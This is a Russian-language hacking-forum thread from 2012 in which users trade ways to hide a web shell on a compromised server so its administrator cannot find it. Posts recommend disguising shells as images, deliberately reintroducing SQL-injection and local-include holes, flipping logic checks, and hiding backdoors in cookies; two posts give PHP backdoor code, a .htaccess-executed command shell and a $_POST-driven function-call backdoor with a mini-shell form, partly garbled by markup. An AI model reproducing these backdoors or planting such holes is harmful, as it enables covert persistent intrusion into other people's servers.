Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   как спрятать веб шелл (https://forum.antichat.xyz/showthread.php?t=353109)

seozone 27.09.2012 19:34

такой вопрос, какие есть способы прятать шелл, чтобы админ его практически не мог найти на веб сервере?

VY_CMa 27.09.2012 20:04

Под изображение, с соответствующим расширением.

winstrool 27.09.2012 20:17

Как не прячь шел от грамотного админа он все равно его найдет, а вот если предусмотреть уязвимую функцию или подправить сценарий убрав в определённых местах кавычки и фильтры, то случай на восстановление сохранится!

seozone 27.09.2012 20:23

Цитата:

Сообщение от winstrool
Как не прячь шел от грамотного админа он все равно его найдет, а вот если предусмотреть уязвимую функцию или подправить сценарий убрав в определённых местах кавычки и фильтры, то случай на восстановление сохранится!

по подробнее разъясни

winstrool 27.09.2012 20:45

убрать фильтрации в sql-запросах, поставить локальные инклуды, зарание найти лог с ошибками.

Cennarios 27.09.2012 22:44

like this:

в родном варианте->

if( file_exists('/etc/passwd') && is_writeable('/etc/passwd')) echo 'done!';

и с поправкой на необязательность читаемости файла->

if( file_exists('/etc/passwd') || is_writeable('/etc/passwd')) echo 'done!';

В данном случае - подменя логического И на ИЛИ. Многоуважаемый Winstrool, как раз и имел ввиду подобные неявные методики.

OxoTnik 27.09.2012 22:54

Проще спрятать бекдор, да не какой нибудь, а чтобы в логах при обращений не отображался.

Да и после вставки самого бекдора, не забудьте изменить чмод и т.д.

Cennarios 28.09.2012 16:48

Не проще. Кое-кто говорил, что все гениальное просто. Не надо никаких наворотов. Почти все бекдоры, в силу своей явной функциональности, легко палятся как визуально, так и всяческим софтом. Конечно, есть нюансы, но в большинстве случаев живут дольше именно баги, а не бэкдоры.

tickhack 28.09.2012 22:26

Основы сокрытия шелла на сервере

Основы сокрытия шелла на сервере

OxoTnik 30.09.2012 07:19

Цитата:

Сообщение от Cennarios
Не проще. Кое-кто говорил, что все гениальное просто. Не надо никаких наворотов. Почти все бекдоры, в силу своей явной функциональности, легко палятся как визуально, так и всяческим софтом. Конечно, есть нюансы, но в большинстве случаев живут дольше именно баги, а не бэкдоры.

ммм .. пока не разу не спалили мой бекдоры в куках а насчёт уязвимости, так она останется в логах

mav1 30.09.2012 09:21

можно спрятать в gif формате

можно спрятать в .htaccess

PHP код:

[COLOR="#000000"]# Override default deny rule to make .htaccess file accessible over web Order allow,deny Allow from all # Make .htaccess file be interpreted as php file. This occur after apache has interpreted # the apache directoves from the .htaccess file AddType application/x-httpd-php .htaccess ###### SHELL ###### [COLOR="#0000BB"]&1"[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#0000BB"]?>[/COLOR]###### LLEHS ###### domain/path/.htaccess?c=command[/COLOR] 


winstrool 03.10.2012 21:56

Как вариант можно вот это куда ни буть залепить:

PHP код:

[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"]]))[/COLOR][COLOR="#0000BB"]stripslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]fun[/COLOR][COLOR="#007700"]]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"]]));[/COLOR][/COLOR

а вот этим вызвать:

PHP код:

[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR]

Mini Shell v 0.1
!

[/COLOR]" method = "post">


Message text:


: 





[/COLOR] 

P.S: Если с толком подойти к вопросу, из этого мини шела такую конфетку можно забобахать! Уверен такими конфетками уже пользуются в тесных кругах).


Время: 22:34